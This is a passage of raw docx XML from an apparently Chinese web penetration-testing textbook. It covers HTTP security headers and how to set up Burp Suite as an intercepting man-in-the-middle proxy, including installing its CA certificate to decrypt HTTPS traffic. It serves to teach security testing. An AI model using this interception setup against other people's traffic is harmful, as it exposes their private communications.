      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Referrer-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：控制请求中</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">头的发送策略，可避免敏感路径或查询字符串通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Referer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泄露给第三方站点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1084"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Access-Control-Allow-Origin (CORS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">相关头)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：跨域资源共享（CORS）策略放开时若配置不当，可能导致攻击者的站点读取受保护资源，详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> API </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">安全（第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）及自有域攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">一个安全配置良好的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用，往往会在每个响应中主动下发上述多种头字段。这些头字段也正是渗透测试过程中通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理审查服务器响应的重要检查点。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="149"/>
    <w:bookmarkStart w:id="153" w:name="burp-suite-代理拦截实操"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.3 Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理拦截实操</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">公司开发的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用安全测试集成平台，社区版（Community</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Edition）免费提供代理（Proxy）、重放器（Repeater）、解码器（Decoder）等核心功能，足以支撑本书绝大部分实操。本节只聚焦代理拦截的基础配置与请求修改流程，高级功能（Intruder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">暴力枚举、Scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自动扫描）在后续章节按需引入。关于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的完整参考可见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger Web Security Academy。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="150" w:name="原理中间人代理与监听器"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理：中间人代理与监听器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp Proxy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的工作模式是经典的中间人代理（Man-in-the-Middle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy）。在用户机器上，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">打开一个本地监听端口（默认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），浏览器配置为使用该代理后，所有</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流量都会先流向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp。对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">明文流量，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">直接查看和修改；对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加密流量，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与浏览器之间建立一个由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">自己签发的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接，再与目标服务器建立另一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接，从而解密、查看、修改流量内容。这要求用户在浏览器中信任</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书，否则浏览器将报证书错误（见图</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 8.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排错部分）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="150"/>
    <w:bookmarkStart w:id="151" w:name="配置浏览器代理与证书"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8.1.3.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置浏览器代理与证书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1：配置代理监听器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">社区版，进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签页，确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy Listeners</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中已存在监听</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的条目，且</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复选框已勾选。若无，点击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Add</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">添加，绑定地址和端口（按默认即可）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2：配置浏览器代理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox，推荐使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FoxyProxy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等扩展进行快速切换。预设代理配置为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，端口</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，并勾选“同样用于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS”。也可直接在系统代理或浏览器设置中手动配置，但前者在测试与日常浏览间切换更便捷。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此时浏览</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">站点，Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Proxy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标签会显示“Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">on”，请求将被截停。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3：安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">证书以支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">浏览器地址栏访问</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://burpsuite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://127.0.0.1:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">），点击页面右上角“CA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Certificate”下载</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的证书文件（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cacert.der</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将证书导入浏览器的受信任根证书颁发机构存储。以</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Firefox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为例：首选项</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">隐私与安全</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看证书</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">证书颁发机构</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导入，选择下载的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DER </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件，勾选“信任该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以识别网站”。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">导入后重启浏览器。此后</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">代理</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时，浏览器不再显示证书错误。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">排错单元</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">代理不通</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确认</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监听端口与浏览器代理配置一致；检查</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Burp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">按钮是否为“Intercept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">on”（若为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且请求未转发，浏览器会一直等待）；检查是否有其他程序占用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -ano | findstr 8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">lsof -i:8080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检查）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">站点报证书错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保证书已导入“受信任的根证书颁发机构”而非其他存储区；重启浏览器；如果仍然失败，可尝试将</w:t>
      </w:r>
      <w:r>
